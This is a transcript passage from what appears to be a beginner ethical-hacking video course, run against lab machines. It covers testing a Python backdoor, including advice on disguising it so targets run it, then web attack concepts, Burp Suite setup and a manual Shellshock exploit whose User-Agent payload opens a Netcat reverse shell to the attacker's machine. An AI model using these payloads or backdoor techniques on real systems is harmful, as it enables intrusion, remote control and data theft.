wants to download, and we're going to send that content to our server program. So how can we do that in Python? Well, we can type as.send, and the thing that we're sending is file.read. This is the entire upload file function. But before we actually close off this video, we must also code the upload function. What if we want to upload a file to the target system from our Kali Linux machine? Well, it is pretty much the same thing. We just need to reverse these two functions, which are upload file and download file. So what I'm going to do is I'm going to copy this function, save this program, go to my server code, and I'm going to paste the upload file function right above the download file. Just here I'm going to change the s.send into target.send. When will this function run? Well, it will run if the command starts with upload. So let's define it down here in the target communication, else if command and first 6 characters are equal to upload. Then we are calling the upload file function onto the command and from the 7th character till the end. Once again from the 7th character, because after the 7th character starts the name of the file that we want to upload. Okay, great, and one more thing that we must do is now we must copy this download file function and add it to our backdoor code. Let's save this, go to our backdoor code, and since we already have the upload file function, right below it we're going to add the download file function. But of course we must change this target into S, because target is not initiated inside of our backdoor code. Here as well. Inside of this statement as well we must change, and at the end, once we remove the timeout, we must also add S. Great. Now that we did all of this, our functions should run. Just before we close off this video, we must also add the upload option inside of our shell function. So let's just go down here below the download and type else if command first 6 characters are equal to upload. Then what we want to do is we don't want to upload a file, we want to download file. And it is the same principle as with the previous function. since if the server sends the upload command, it wants to send its own file to our backdoor. Therefore, from the backdoor perspective, we are downloading that file to the target system. And what we must specify is command from the 7th character till the end. And that would be about it. We coded the download and upload functions. Now, we're not going to test them inside of this video, but in the next video. We're also going to test our previous commands and see if our backdoor works on the target system, if our quit command works, if execution of the commands work, if we can change the directory, and at the end, we're going to see whether we can upload and download a file from that target machine. See you in the next video. Welcome back. In this video, we're finally going to test our backdoor. Now, we're going to see whether we get some errors during the compiling of the program. We're going to see if all of our commands work. So we will be testing uploading files, downloading files, and other commands as well. And if we encounter any error, we're going to fix it to make our backdoor fully work. Now, the first error that I want to change from the previous video is inside of our backdoor code. And what that is right here in the upload command, I didn't specify download file, I only specified download. And if I were to compile this program, this function would not work because there is no download function inside of our code. There is only download file function. Now that is the only error for now. Let us save this. And if we go and compile the program, so what I'm going to do is I'm going to copy the backdoor.py to the home, Mr. Hacker, and then desktop. Then I'm going to paste the backdoor onto my Windows 10 desktop so I can compile it later. And right after it, I'm going to check out whether I set the IP addresses correctly. So what I got inside of our server and backdoor is the IP address of 192.168.1.12 and port 5555. Now, port is something that we do not need to change unless some other program is using it. But what we must check out before running both of these programs is our IP address. So in my case, it does match. My IP address is 192.168.1.12. So I can straight away start my server. It will listen for the incoming connections, and while it is listening, I will go and compile my backdoor. So for this, I will open the command prompt, I will navigate to the desktop directory, and if you remember the command, we must run pinstaller, then the name of the program, and then --1 file and --no console. Once we specify this command right here, then we can press enter. Now what you can do after you test out this program and it works successfully, then you can apply other methods such as making it look like an image, something that we already covered before, to make your backdoor even more trustable to the target so they can execute it. Our compiling of the program has finished, and here we get those 4 files. These 3 we can delete straight away, and all we need is this directory. We have our backdoor.exe, and if we run it, remember that inside of our code, it will wait for 20 seconds before establishing connection to the server, and hopefully in just a few seconds, we should see right here a shell pop up on the target system. And here it is. We got the connection from 192.168.1.4, which is Windows 10 machine, and it is initiating the connection from this port number. Now let's test out all of the commands that we applied to our code. So first of all, let's start with simple commands such as simple command prompt commands, which are whoami, ipconfig. Let's run netstat to see whether we are going to be able to see all of the connections that our Windows 10 target machine has, and we do manage to see it. If I type dir, I will only see backdoor.exe because inside of the this directory we only have backdoor.exe program. Now comes the crucial part. Are we going to be able to change the directory to one step back and see the contents of the desktop directory? Let's give it a try. If I type the command cd and then 2 dots, press enter, run dir command, and here it is. We successfully changed the directory to the desktop directory. Let's try to go to some other directory. Let's for example go one more directory back. So if I type once again, type dir, And here it is. We're one directory back, and we can change the directory from here. If I go to Documents, now I'm inside of the Documents directory, so I can successfully change the directory to whichever folder I want. Now, before we continue with execution of other commands, let us navigate back to the desktop directory on my Windows 10 machine, and from here, let us test out whether we can upload and download files. So what I got inside of my tools directory on my Cal Linux machine is I got this tester.txt file. And this is simply just a txt file that says hello world. What we want to do is we want to see whether we're going to be able to upload this file to the target system. So let's give it a try. If I go right here and type upload tester.txt, now before you run this command, make sure that the file that you're trying to upload is in the same directory as your server.py. Otherwise, you will need to specify the full path to that file, because if you don't, this will not work and it will probably crash. So let's give it a try, since tester.txt is in the same directory as both of my programs. If I press enter, let's go to our Windows 10 desktop, and here is the tester.txt. If I open the file, here it opens hello world. So we successfully managed to upload the file to the target machine. This file wasn't here before we ran our program. Now let's see whether we can still execute commands. Maybe it crashed something. So if I run whoami, I can still execute more commands. Let's give a try to the download function. So in this case, we're going to download something from the Windows 10 desktop. So what I'm going to do is I'm going to open a notepad and I'm going to write something. So for example, this is a file from the Windows 10 machine. I'm going to save it onto my desktop as a try download me.txt. So here it is on the desktop, and if I go right here, type dir once again, we should see that file inside of our dir output. Let's give it a try and try to download it. So download try download me.txt. One more thing, make sure you specify the name correctly, otherwise it will also crash, because if you specify a name of the file that doesn't exist, it will not be able to find it. So if I press enter right here, it will take a few seconds, and if I go inside of my backdoor directory, type ls once again, here we have try-download-me.txt file. If I cat it to see the contents, here it is. This is a file from the Windows 10 machine. So our commands work successfully. The one last command that we must give it a try is the clear command. So if I type clear, it will clear our screen and we will be able to execute other commands in a more clear terminal. Great, everything works as we planned. Now, the one last command that we must test is the quit command. So if I go to my task manager, while I still didn't close the backdoor, you should see backdoor.txt running as a background process on the Windows 10 machine. But if I type quit, it will close the server from the Cal Linux machine, but let's see whether it will also close the backdoor in Windows 10 machine. And it does indeed close it. We no longer see backdoor.txt process right here inside of our task manager. So everything worked as we planned. All of the commands that we applied are working successfully. Now, what you can do from here is you can try applying different commands and making this backdoor even better. You can try adding a keylogger in Python, you can try creating a persistence using registry. You can try executing screenshots, and all of this I do in my Python 3 hacking course. But since this is a beginner course in complete ethical hacking, we will stop here and we're going to focus on some other subjects from the next video. But you can improve this program a lot if you learn Python and add even more functions to this program. Nonetheless, this is another project that we did successfully, and in the next section we're going to touch on a big subject of web app penetration testing. See you in the next video. Welcome back. Time to cover another big topic for an ethical hacker, and that is web app penetration testing. This is another topic that you can further specialize in if you decide that this is what you want to do. But what it essentially is discovering vulnerabilities and bugs inside of a website. Why is this so important? Why are we devoting an entire section only for this, and we didn't throw this inside an exploitation section, for example, as a part of it? Why aren't we discussing all applications that you can run on a machine and not just web applications? Well, it's pretty simple. Websites are exposed to the internet. That means anyone can visit it and look at it. As good as this is, it also brings danger to the table. Because if anyone can visit it and look at it, then anyone can also try to attack it, right? For example, let's say we have a server hosting a web page on port 80 for HTTP and on port 443 for HTTPS. This website can be any type of website, from chat forum to some university page. It doesn't really matter. What matters is that it's accessible to the internet by anyone who knows its domain or its IP address. So just by knowing the name of the website or its IP address, anyone can look at that website, even us from our Kali Linux machine. The problem is that an attacker isn't interested in just watching the web page and using it as it's planned to be used. An attacker will try to execute different types of the attacks, from code injection to brute force attacks if there is a login page. The attacker can even try extracting data from the database and changing the code of the web page itself. We can try uploading malicious files to the server to see whether that will work too. We can test for different user inputs to see if the input is well filtered or is the website code written poorly and doesn't filter any input whatsoever. You know what the best part is about all of this? A poorly written code that makes website vulnerable to some type of the attack doesn't only present danger to the server hosting that website, but it also presents danger to everyone that visits that website as well. For example, we can try to inject code into a certain web page, and if that is successful, that code will be displayed and ran by anyone that visits that page after the attack. This could be some malicious JavaScript code that could send the victim's private information to our Kali Linux machine where we can read it. We can also try injecting different redirection links into that website, so anyone searching for that page gets redirected to our malicious website where we can steal their information. Imagine we do something like this on a website as big as PayPal. That would be a big problem, right? That's why web penetration testing is so important. And most of the attacks that we will cover are based on poorly written code. We know that websites are mainly made in HTML, CSS and JavaScript code. All of them can be used to attack websites with code injection. And what code injection is simply writing code somewhere where you shouldn't be writing it. For example, let us say a website has a search bar where you can search different book titles. A regular user would type book titles in that search bar in order to find a book that they want to read. But an attacker would try writing code there. It might or might not work. If the user input, which in this case would be a book name, is poorly filtered and it allows anything to be written there, then the code injection will most likely work and we will be able to inject code into that web page. Cool, right? Now, the most dangerous one out of these three would be JavaScript code injection, or also known as cross-site scripting attack, or XSS attack. Why? Well, HTML is static and the only thing we could do with an HTML code injection is to change the look of a web page. While with JavaScript, we can execute various functions which give us much more power. Another thing that we can try is to communicate with the database. For example, let's say a website has a login page where you need to input a username and a password. Usually big servers and websites will store those usernames and passwords inside of a database, and every time a visitor of the website tries to log in, the server will then communicate with the database. it will compare the visitor's input of username and password to see if they match with something from their database, and if they do, then the website will log in the user to their profile and the user will have access to all of their data. This type of communication between the website and the database can be done with something called SQL queries. And SQL is a language that allows us to interact with databases. It is heavily deployed in websites. Now, this right here is an example of a normal usage of a website. So the user sends username and password, website checks it. If it's inside its database, if it is correct, it logs in the user. If it is not correct, it will print out password incorrect or email incorrect or something like that. But what if we, as an attacker, try sending an SQL query instead of a username, for example? What then? Well, there are two outcomes. Either the web page is well coded and it filters out user input so that the website doesn't allow SQL query syntax and it will not even process it to the database. Or it is poorly written and it will just forward our SQL query to their database. And this can be critical because we can send a query where we request the entire database back and the database will just send us all of its contents where we will have everyone's usernames and everyone's passwords who have an account on that website. That would be really, really bad. And that is the reason this is one of the most dangerous attacks that you can do on a web page. It is also one of the most common ones as well. Ever read a heading inside some newspaper that said something like 10 million credit card numbers stolen or some big website got millions of passwords leaked? Well, now you know how they do it. They do it by injecting SQL queries into a non-filtered user input. This attack is also known as an SQL injection. You're starting to understand now why this is as important as exploitation of network vulnerabilities that we did. Now, another type of the attack could be aimed at a server, and this would also be an attack through a user input field. Let's say, for example, we have a website that pings other websites. You input an IP address of a different website and our website will tell you whether that other website is up or offline. So we can type, for example, some random IP, let's say 75.101.23.55, and the next step is website pinging that IP to determine if it's online or offline. How would it do that? Well, it would most likely run the ping command on its system, so if the website is hosted on a machine, the machine would run ping 75.101.23.55, or if it is hosted on a server, the server could execute that command. I believe by now you can already see where the problem can occur. What happens if, instead of an IP address, we send a different command, such as whoami or ls? Well, as we already know, it will all depend whether the user input is well filtered. If it isn't, it will execute any command that we send, and then we can gain access to that server by trying to establish a connection with Netcat command just because someone didn't write website code well. All of these things that we discussed are also known as bugs. Or you might have heard about the term bug bounty. It is a pretty big thing. Websites will pay you to find vulnerabilities that we just talked about, and they will pay you a lot for them. And as we already know by now, all of these vulnerabilities happen due to poorly written code. Or in other words, these vulnerabilities can occur anywhere where the website will process a visitor's input. Whether it's inside a search bar, a username field, or inside of a link, if that what you send to the website is getting processed and it doesn't get filtered, then we could have a bug. I will give you another example right here, just so you can test and try to figure out which vulnerability this is out of the three that we mentioned in this video. Let's say we have a website where you can watch videos or movies. So it's got a search bar where you can input a movie name and then it will display the movies that you searched for. And now let's say that instead of a movie name, you send malicious JavaScript code. What vulnerability is this? I will give you 5 seconds to figure it out.
I am you.
And it is cross-site scripting or XSS attack. Don't worry if you didn't remember it. Each of these attacks we will cover in details, and we will see a practical example of each one of them. And also, besides these attacks, we will cover what I believe most of you are also interested in, and that is brute force attacks. And these brute force attacks are pretty much simple to explain. It is not a vulnerability. It is just a poor password or a weak password that someone uses that we manage to break, or should I say, guess. How do we guess it? Well, we send a lot of different passwords and hope that eventually we send the correct one. That is the entire process behind a brute force attack. And if the target's account has a weak password, and if that password is in the list that we're using to brute force, then it's pretty much game over. We will be able to get it. Now, this can also come with different difficulties, such as if the website blocks inputting passwords after 5 wrong attempts, but this can also be bypassed. Nonetheless, these are some of the most known website attacks, and in this section we will see how to perform each one of them. See you in the next video. How do we communicate with a website? Most of you probably know this already, but I will mention it in this video just so we can get a quick refresher. We explained all of these attacks in the previous video, but it's important we know the basics behind communication between a client and a website. So we send requests and receive pages back with the help of HTTP requests and HTTP responses.
Are you scared?
HTTP request is something that we send to the website once we want to get a certain web page from that website. And HTTP response is a response from the website telling us that either it found the page that we were looking for or it didn't. HTTP response also contains an HTML code of that web page that we requested. Now, this would be a basic explanation of the process, but let us also take a look at how an HTTP request and an HTTP response look like. So, if we take a look at this image right here, in the red letters we can see HTTP request to some web page, while in the blue letters we see an HTTP response. Let us focus first on HTTP request. So, some of the known fields from the HTTP request would be ones you see in the image. We got hosts, and that field defines the website domain that you're searching for. Sometimes this field can also have a port number, due to web servers sometimes hosting more than one website. Besides that, we also got the user agent field, and this field is used by server to identify the client that is connecting to the server. By identifying, I mean it will usually identify the web browser that the client is using. HTTP request can also have cookies, which we can't see here in this picture, but what cookies are values exchanged between a client and the server that are used for holding data and information about a certain session that the user has. Sometimes an HTTP request can also have authorization parameter, which is used to check for the identity. With this parameter, usernames and passwords are sent to the website. On the other hand, we got an HTTP response, which also has some special fields of its own. First thing we see is the status code. Now, a field called status code doesn't exist, but the value will be stored in the first line of the response. Most of you encountered at some point an 404 error once you try to search for a certain web page, and 404 in this case is a status code. In this picture, we can see a status code of 200, which indicates that the page exists and that we loaded it successfully. Besides this, we got set cookie field, and this field, if defined, will establish values of cookies to the client. This value server can use later to identify the client and to also store client's data. We also got field called cache control, and this field is used if the content of the response should get stored inside the browser of the client or not. And we also got content length that will tell us size of the response in bytes. Below all of these fields, we can see HTML tags opening, and down there is the web page that we requested from this website. It sends us the web page code that will then get rendered inside of our browser, and it will show us the web page. Simple as that. Great. Now that we refreshed our memory about this, let us finally start attacking websites. See you in the next video. Welcome back. And in this video, I want to talk about another thing that we already covered, and that is enumeration and information gathering. So this is a step that you also shouldn't skip once attacking websites. We already covered information gathering, so this video is more like something as a refresher, just so you know which tools you can use to enumerate and to scan different websites. So for this section, we're going to be using Metasploitable most of the time. We're going to attack some different targets, but for the start, we're attacking Metasploitable. So make sure that Metasploitable is up and running. I also ran the ifconfig command, and it gave me the IP address of 192.168.1.8. So the first thing that we can do is try to visit the web page of that IP address, just to see what we have. And to do that, we can open our Firefox. And remember that once we attack Metasploitable, we said that we're going to attack port 80 later in the course. Now it came that time. We are going to attack port 80. And once again, we're attacking port 80 because it hosts a web page. If I visit this IP address of my Metasploitable, it will open this page right here. It tells us the warning, the contact, and the login to get started. But down here we get a couple of links. If we go to any one of them, it will lead us to a different directory of this web page. Currently, we're in the /dev directory. If I go to the parent directory, it will go back to the 192.168.1.8, which is the main or the parent directory. If I go and visit dvwa, it will lead me to this directory right here, which is /dvwa/login.php, and this file hosts a login form. So we got username and password to input. If we take a look at this web page a little more clearly, we can see down here that it tells us default username is admin with password. So for now, we're not going to brute force this, we're just going to log in so we can see what we have behind this login form. And here it is. We got dvwa, or as we can see right here, it has this name. We get a warning, a disclaimer, and here we get a bunch of different attacks that we can perform. Remember, we talked about XSS, we talked about SQL injection, we also mentioned brute force and command injection, and these pages are pages where we can practice these type of the attacks. All of them are stored in a separate directory. Now, we can go about discovering all of the directories on a website like this, or we can use different tools to automate this process. So, to enumerate and to gather as much information that you can about the website, you can use the tools that we already covered, such as the harvester to gather emails, such as WhatWeb to discover the website technologies, and all of them we already covered. We're not going to do that once again, but there is another cool tool that you can use to discover directories, and that tool is called Derb. Derb is already installed in Cal Linux by default, so only thing we need to do is to type derb and we will get the help menu for this specific tool. We get a bunch of options, as we can see right here, but also down here we get the examples of usage of this tool. So the most simple test, as it says in the brackets, would be just specifying derb and then the link to the web page that we want to scan. If I go up here, we can also see that we can specify different word list, but I believe derb has a default word list that it uses, so we're just going to go with that one instead. So if I type derb and then 192.168.1.8, oops, invalid URL, so we must specify derb and then http //192.168.1.8. So this is how we must specify a link. If I press enter, it will go and search for different subdirectories inside of that web page. If I scroll a little bit up, we can also see it managed to find some of them. It found /index, /index.php, /phpinfo, /phpinfo.php, we got /test, /twiki, and if I go all the way down, we should be able to find even more subdirectories on that web page. And right here we might be able to find something interesting. For example, we can go and visit any one of them. Let's visit robots.txt. If I copy the link, go up here, paste the link, we get something right here, user agent, disallow. We already know what user agent is. It is a field inside of the HTTP requests. Let's also see what else we managed to discover. We got /test/themes, readme, phpMyAdmin. That could be useful. Let us check out what this is. You never know, anything that you find particularly useful or interesting, you might want to check out by visiting that page. And this seems to be some file with the PHP code. So let's go and check out something else. And it seems that there is a directory called passwd. Let's see what this is. If I copy that as well, go and paste it. Missing fields, fields go with marker required, please go back in your browser and try again. Topic web home, so it seems that this page is missing some fields. Right now we don't really know what this is all about, but by visiting this we discover more and more pages that we might not be able to find once browsing through that page on our own. Now right here we can also notice some other information that we get on the side besides these links, and that is the code. And if you remember, this code is simply just a status code which tells us whether it managed to load a page. Right now we get code 200 for most of these pages. Sometimes we will get code like 304, which means that the page gets redirected to a different page, and at the right we also get the size of that specific page, which is not something that we're currently interested in, but you also get that information if you want to see it. We can see other links as well, and you would go about visiting any link right here that you find interesting. So let us go down, and it seems that it found 56 links, but that is only with this specific word list. It also downloads, I believe it downloads the contents, but I'm not really sure about that. However, what you can do is, if you're not satisfied with the results from this derb directory, you can specify your own word list if you want. Nonetheless, this is not that of an important tool for us. However, you can use it if you like, and you can combine it with different tools that we covered for the information gathering to gather as much information about a specific website. Now, since we already covered information gathering, I'm not going to go into those different tools. You can also try finding new tools from the GitHub or somewhere else, and you can experiment with those tools as well. But right now, what we're going to do in the next video is we're going to configure a really important tool that is called burpsuit. And as soon as we do that, we're ready to perform our first attack. Welcome back. Time to configure the tool called burpsuit. And burpsuit is a tool that allows us to intercept and take a look at different HTTP requests and HTTP responses. It also allows us to change those HTTP requests to our liking and then forward them to our target. It is also considered a proxy, so everything and every link that we visit to our Firefox from now on will go through burpsuit first, and we will be able to inspect all of our HTTP requests and responses. Let us see how we can configure it and get it to work. So we already got burpsuit inside of our Cal Linux machine. If you go onto the menu and then Web Application Analysis, you will have it right here. The first thing that we want to do is double-click it to start it up. This will start up the burpsuit Community Edition, and there is also a Professional Edition that you must pay for, but for now on, we're just going to cover the Community Edition inside of this course. It might give you this error, you just want to click on OK, and in just a few seconds, we should have the main menu of burpsuit open up. And here it is, Terms and Conditions. I want to click on Accept, and here it tells us an update is available. I'm not really interested in the update at the moment. Here I want to select the temporary project, click on that and click on next. I want to select right here use burp defaults and start burp suite. After a few seconds it should open something like this, and we can see a lot of things are happening on our screen. If I enlarge it, you will see that we get a bunch of different options with this burp suite tool. But let's not think about them at the moment. For now, let us just think about how we can configure our burp suite to be used by Firefox as proxy. Well, the first thing that we want to do is navigate to the burp suite tool, click on proxy right here, and under the proxy we get this options tab. Under the options we will have these proxy listeners, and under the proxy listeners you want to select this right here and you want to click on edit. If you don't have anything right here, just click on add. Here we want to bind to port 8080 and we want to bind to address loopback only. Once you get this set up, click on OK, and after you got this, what we want to do is we want to navigate to our Firefox, and on these three lines right here we want to navigate to the preferences. Under the General tab in the Preferences, we want to navigate all the way down, and at the last option where we got Network Settings, we want to click on Settings. Here it will ask us to configure proxy access to the internet, and we want to set right here Manual Proxy Configuration. Under the HTTP proxy, we want to set the IP address, and in our case we are going to set the IP address of our local host, which is for everyone this IP address right here, and the port should be 8080. And then we can set use this proxy for all protocols. Also make sure that the SOCKS v5 is checked, and once you do all of that, you can click on OK. Now that we did this, if I go and try to visit google.com, it will tell me software is preventing Firefox from safely connecting to this website, and you should get this error too. Why does this happen? Well, our Firefox doesn't really trust our burp suite tool, and currently all of the packets are going through this tool before we can see them on our screen. So we're getting a warning from the Firefox that some software is preventing from having a secure connection to that website. What can we do about this? Well, we can go to our Firefox and visit any HTTP website that we want. It won't present us a problem for HTTP websites. It will only present us a problem for HTTPS websites. But we also want to visit HTTPS websites such as Facebook, such as Google, and all the others. To do that, we must type this link inside of our search bar, which is http // and then burp. Press enter, and you will open this page right here. It will tell us welcome to Burp Suite Community Edition, and here we will be able to download the certificate, which we can then import inside of our Firefox and make Firefox trust our burp suite tool. So just click on CA certificate, click on save file and click on OK. Once you do that, the file will be inside of our downloads directory, as we can see it right here. This is its name, and all we need to do is go back to the preferences inside of our Firefox, navigate to privacy and security, and all the way down we will have a certificates part. Under the certificates part, we want to click on view certificates, and we want to click on import a certificate. Then you want to navigate to the downloads directory, select the certificate that we just downloaded, and then click on open. We want to select trust this CA to identify websites and trust this CA to identify email users. Click on OK, and also click on OK right here. If I go back and I refresh google.com, it seems to still load. It doesn't really do anything. So why isn't it loading our page? Well, in the burp suite by default, you should see, if you go back after trying to open Google once again, that this proxy will turn orange and this intercept will also turn orange. So if we go to proxy and then intercept, we will have an HTTP request. and this is a request that we just initiated to the host www.google.com. We can see all of those fields that we talked about, such as host, such as user agent. Under the user agent we can see which type of web browser are we using. We can also see the cookie right here. And the reason why we are not loading the page and it is still loading right here is because the intercept is turned on. This means it will intercept this packet before it actually forwards it to the web page. We can forward it manually by pressing this, or we can just turn the intercept off and then it will not intercept any packets. So if I go back to Google, right now you can see we successfully loaded Google. If we want, we can go right here under the target and we can see all the links that we visited while the burp suite was running. So we can see Google right here, and we can see all of the requests and responses that we got for the Google. So here is the request for the www.google.com that we just did, and here is the response from the Google that says status code 200 OK, which means we successfully loaded the page, which we indeed loaded, and here is the code of that page. Cool, right? Now we can intercept any packets to any website. Great, now that we covered configuration and burp suite, in the next video we can go and perform our first attack. And in the future videos we're also going to cover more details about this burp suite tool, but for now on we just managed to configure it and we're ready to, in the next video, perform our first attack. See you there. Welcome back. It is time that we cover our first vulnerability in a website. And as a first vulnerability, I've chosen to show you the shellshock exploitation. Now, shellshock is an older vulnerability. It was discovered in 2014 and you will most likely never find it today while performing penetration tests. But nonetheless, I want to show it to you just because of the impact that it had. Shellshock is considered one of the most critical and serious vulnerabilities ever discovered. This vulnerability occurred due to Bash differently processing environmental variables. With this, many things were hit from DHCP clients, from terminal command lines to CGI scripts inside of web applications. And in this tutorial, we will see an example of exploiting shellshock through the CGI script on a web page. Also for this, we're going to download a small ISO file that will allow us to run a virtual machine only for this vulnerability. Don't worry, it will only take a few seconds to install due to it being a small virtual machine, and it is only purposely designed for this specific vulnerability. To download it, you want to go to your Google, you can type in Pentester Lab Shellshock, and you should see a link like this that says CVE 2014-6271 called Shellshock. It will be from the pentesterlab.com, and you want to click on it, and it will navigate you to this page right here, where you will have the shellshock introduction, fingerprinting, and all the other stuff regarding this vulnerability. However, we're not going to go into these details right here, because we want to exploit it ourselves. What we want to do is we want to go to the files right here, and you should see this ISO where you want to click on it, and it will download the ISO image with the size of 19.1 megabytes. So you can see it is really small. Once you do that, you want to go to your VirtualBox and you want to create a virtual machine, as we usually do. Now, I already got Shellshock Lab created with the ISO file that we just downloaded, but what you essentially want to do is you want to click on New, then you can call it anything you want, you can call it Shellshock. You can select right here Linux as an operating system, and the version of Linux is going to be Other Linux 32-bit. Click on that, then you can proceed to Next. You can leave it to 256 megabytes of RAM, that is more than enough for this machine. Click on Next right here. We want to create a virtual machine, Next here as well, and we can click on Create. And as usual, there are two more things that we want to do once we create a new virtual machine. We want to navigate to the settings. From the settings we want to go to Network, switch from the NAT to Bridged Adapter. Select your adapter right here, and another thing that we want to do is we want to add our ISO file. So delete this empty right here, click on the disk icon, click on Add, and find the ISO file. In my case, here it is, CVE 2014-6271. Click on Choose and click on OK. This will create your Shellshock virtual machine. After you do that, you want to go to your Cal Linux, start your burpsuit tool that we covered already, that we covered the configuration of, and you want to go start it up. And after you start it up, you can open your Firefox. Now, you might have noticed if you tried before watching this video that once you try to visit Firefox without having burpsuit running, you will not be able to visit any page. And that is because we set our burpsuit to be a proxy for our Firefox. So now, every time you want to visit Firefox page or any website page, you must have burpsuit open. And you must also have the intercept turned off so it doesn't intercept any packets. Otherwise, your page will just load forever. Now that we opened the Firefox, let us open burpsuit 2. It is starting the project, and as soon as it opens up, we will be able to visit our page on our Shellshock virtual machine. Okay, so now that burpsuit opened, go to Target, then go to Proxy and turn off the intercept right here. So intercept should be off. Once you do that, the next thing that we want to do is we want to start our Shellshock virtual machine. If you're starting it for the first time, it should only take a few seconds to set everything up, since it is a really small virtual machine. And once it opens up, it won't even prompt you for a login. There is no login available inside of this machine right here. It will just enter the command line where we want to type ifconfig just to find out the IP address of this machine, and in this case it is 192.168.1.10. So all we want to do is we want to go to our Firefox and visit this page to see what we have. And this seems to be the entire page of this virtual machine. We get this system is running, the time that it is running, currently for 0 minutes because we just started it up, and we get the kernel of that virtual machine. Now, if we take a look at our burpsuit right now and we go to the targets and we go to our IP address of the Shellshock virtual machine, we will see all the links that we requested once trying to open the web page of our Shellshock virtual machine. We will see this / directory, we will see this JavaScript file, and we will see this CGI bin status directory. So we get a CGI script right here. If we go to the response of that request that we sent, and to do that you simply just select the request that you want to go to and click on response right here. Then we will see down here this output that looks a lot like an output to the command uname-a. For example, if you run the command uname-a inside of your terminal, it will give you an output like this, which will tell you which version of Linux are you running, and so on and so on. We get a similar output inside of our burpsuit, as we can see right here. And in most cases, this output is ran by the uname-i command, and it is ran by bash. And inside this request that we did, user agent field that we got inside of the request is an environmental variable when processed inside of this CGI script. So what we can try is to inject a command in that field, however, it won't work that easy. We can't just inject, for example, whoami command instead of this, it will not give us any output back. You might be asking why? Well, because Shellshock vulnerability is based on first specifying an empty function. And I know this might sound confusing, but just stick with me for a couple more minutes and I will explain it how it works. The vulnerability itself was discovered when inside of an environmental variable such as this user agent, empty function syntax was specified. And empty function syntax looks something like this. Let me show you inside of the terminal. It is this set of characters. So open bracket, close bracket, then space, open curly bracket, then space, 2 dots, dot and comma, and closed curly bracket, and at the end another dot and comma. And this right here is a syntax for an empty function. So any command that we want to run, before it, we must have this empty function syntax. Why? Well, when bash gets these characters in this order, or if bash gets this empty function with the variable, instead of blocking it, it will accept it with the variable that comes after, and it runs it as a command on the server. And that is the entire vulnerability. All we have to do is to specify a command after this syntax, and it should work. Now, to do that, we must send this HTTP request right here to this CGI bin script once again. And we must specify instead of the user agent the empty function syntax and then our command. So how can we do that? How can we send the request once again? Well, luckily, burpsuit allows us to edit our requests and send them as many times as we want. All we need to do is to select the request that we want to send again, so we select it right here, then we right-click and send to repeater right here. Then you will see this repeater part light up, we want to go there, and here we can edit our request before actually sending it. So we mentioned that we want to inject the command inside of the user agent field. Let us remove this. And let's type the syntax for the empty function first. So open and close bracket, then empty space, open curly bracket, then space, 2 dots, comma and dot, close curly bracket, and comma and dot at the end. Now, what you can do after this is you can inject your command. And if you want to, you can test to see if it works with the ping command first. But I'm not going to test it with the ping command, I'm going to straight away try to establish a connection with our Kali Linux machine and get a reverse shell back. So what do we want to do right here to establish a connection with our Kali Linux machine? Well, we want to execute /bin/bash. And this will tell the target to execute the following command. If we specify -c after, it will tell our target that whatever we send after this will be our command, and we must specify it between the single quotes. So for now, we have the empty function syntax, then /bin/bash -c, then open single quotes and close single quotes, and in between the quotes we type NC, which stands for Netcat, and we specify the IP address of our Kali Linux machine. So let's check it out right here. Sudo ifconfig test1234 is my password, and I will specify 192.168.1.9. So right here, 192.168.1.9, and I want to specify also the port to connect to. In my case, I will use port 12345, it doesn't really matter. And at the end, we want to specify -e, which stands for what we want to execute on our target machine. And we want to simply just use the bash shell. So we can do that by specifying /bin and /bash. And this is the entire command. I will copy it to my terminal so you can see it enlarged. So copy, and if I clear the screen, paste it right here. This is our entire command. The empty function syntax and then the function that allows us to establish a connection to our Kali Linux machine. But before we send this request from our burpsuit, we must set up a listener right here. So I'm just going to go and type nc lvp and then on the port that we specified, which is 12345. Press enter. This will listen for the incoming connections, and now that we changed the user agent field to our command, we can click on send. If I go back to our Kali Linux terminal, we can see we got the connection from our shell-shock virtual machine. And if we try to execute commands such as whoami, all of that will work. We can see we are the pentester lab. The ls command will give me all the directories inside of the current directory. I can type the pwd to check out my current working directory, and I'm in the /var/www/cgi-bin folder. Great. So we successfully exploited the shell-shock vulnerability and gained access to this machine. Now, you can also automate this entire process with Metasploit Framework. So what we did right here is we manually exploited the target with the help of a burpsuit. We sent our request for the CGI bin script to the repeater, then we changed the user field to our command, which requires the empty syntax at the beginning, and after it the command that we want to execute, which can be any command that you really want. Then we set up a listener inside of our terminal, and we sent this packet once again, or we sent this request once again. Right here we can see the response to this request, and it tells us that we got the internal server error because it doesn't really recognize this user agent. However, it did execute this command, which is all that we want. Inside of the Metasploit framework, you can type search shellshock, and you can use this exploit right here, which is exploit multi HTTP Apache mods CGI bash environmental execution. You can copy that, type use, and then paste the selection. It will set our payload to be Linux x86 Meterpreter reverse TCP. And if I type show options, I can set my options right here. So what I must set is the rhosts, which is the IP address of my target machine. Let's do that first. What I also must set is this R path. So this will be the path to the CGI script. So the R path must be set to CGI-bin/status. If I'm not mistaken, that is the path. Let us see inside of our burp suite. So it indeed is CGI bin and then status. And all we're left to do right now is set this and run our exploit. So, oh, pardon me, it's not there. Let us just go and set the target URI. It is target URI that we must set to be the CGI bin status. So let's just set the target URI instead. And let's set the rpath back to /bin, I believe, and let's give this a try. We send this, we get the Meterpreter session 1 opened, and here it is. Get user ID will tell us who we are. We can execute the commands, and we can do everything that we did inside of our exploitation section. So we successfully exploited shellshock vulnerability in 2 different ways. Manually, by using burp suite and setting our command in the user agent field, and with the help of this Metasploit Framework module. It also exploited the user agent field, as we can see right here. We told the path to be CGI bin status, and we got the Meterpreter reverse shell back. Great. Now that we did this, in the next video, we're going to check out a very similar thing to this, which is called command injection. See you in the next video. Welcome back. In this video, we're going to cover command injection vulnerability. We already know what this is, and we already covered some type of command injection in the previous video once we exploited the shellshock vulnerability. However, now we're going to do it on the web page itself. So, do you remember this example on the screen that we talked about? Say we have a website, and that website can ping an IP address that we tell it to ping. And it will tell us whether that IP address is offline or online. Well, we're going to take a look at this example inside of our Metasploitable. So, for this, you want to start your Cal Linux machine and your burp suite inside of your Cal Linux machine. Now, we won't be using burp suite in this specific video, but nonetheless, we must have it started because we connected it to be the proxy to our Firefox. If it is not open, we won't be able to visit web pages. After that, you also want to open up your Metasploitable virtual machine and check its IP address, and then we want to visit the command injection page on our Metasploitable machine. So go to your Firefox right here, type in the IP address of your Metasploitable. It will lead you to this official page where we want to go to dvw8. Let us log in with the credentials that they give us, which is admin for the username and password for the password. Click on login. We don't want to save these credentials, and we want to go to the command execution, or otherwise known as command injection. But before we attack it, let us go to dvwa security and set the security to low, because right now we can see down here that the security level is set to high. So let's go right here, check this 